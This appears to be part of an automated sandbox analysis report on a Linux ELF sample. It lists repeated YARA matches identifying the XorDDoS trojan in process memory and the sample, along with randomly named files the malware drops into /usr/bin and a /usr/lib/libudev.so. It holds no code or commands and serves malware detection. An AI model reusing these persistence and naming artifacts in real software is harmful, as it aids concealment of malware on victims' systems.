Source: Yara match	File source: Process Memory Space: 1.elf PID: 6315, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6317, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6320, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6323, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6329, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6332, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6335, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6337, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6346, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6349, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6351, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6354, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6357, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6363, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6366, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6371, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6374, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6382, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6385, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6390, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6393, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6402, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6405, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6411, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6414, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6419, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6422, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6424, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6427, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6430, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6439, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6441, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6447, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6453, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6456, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6458, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6461, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6470, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6473, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6475, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6478, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6482, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6491, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6494, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6499, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6505, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6510, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6513, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6524, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6527, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6529, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6533, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6535, type: MEMORYSTR
Source: Yara match	File source: /usr/bin/ssrfvzfvpk, type: DROPPED
Source: Yara match	File source: /usr/bin/uaewjndswe, type: DROPPED
Source: Yara match	File source: /usr/bin/cpbnjarskl, type: DROPPED
Source: Yara match	File source: /usr/lib/libudev.so, type: DROPPED
Source: Yara match	File source: /usr/bin/wxysocrflf, type: DROPPED
Source: Yara match	File source: /usr/bin/efgdvbpuxx, type: DROPPED
Source: Yara match	File source: /usr/bin/ccxfvtbhgr, type: DROPPED
Source: Yara match	File source: /usr/bin/lkzqkklpfr, type: DROPPED
Source: Yara match	File source: /usr/bin/ezztyrfjzf, type: DROPPED
Source: Yara match	File source: /usr/bin/dyuvutukki, type: DROPPED
Source: Yara match	File source: /usr/bin/vapcvdizxx, type: DROPPED
Source: Yara match	File source: /usr/bin/nxattrsdxm, type: DROPPED
Source: Yara match	File source: /usr/bin/bjhrrojebv, type: DROPPED
Source: Yara match	File source: /usr/bin/vlteqhfomz, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 1.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 1.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 1.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 1.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 1.elf, type: SAMPLE	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: 1.elf, type: SAMPLE	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6419.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6419.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6419.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6419.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6419.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6419.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6244.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6244.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6244.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6244.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6244.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6244.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6368.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6368.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6368.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6368.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6368.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6368.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6257.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6257.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6257.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6257.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6257.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6257.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6260.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6260.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6260.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6260.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6260.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6260.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6458.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6458.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6458.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6458.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6458.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6458.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6478.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6478.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6478.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6478.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6478.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6478.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6535.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6535.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6535.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6535.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6535.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6535.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6335.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6335.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6335.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6335.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6335.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6335.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6516.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6516.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6516.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6516.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6516.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6516.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6402.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6402.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6402.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6402.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6402.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6402.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
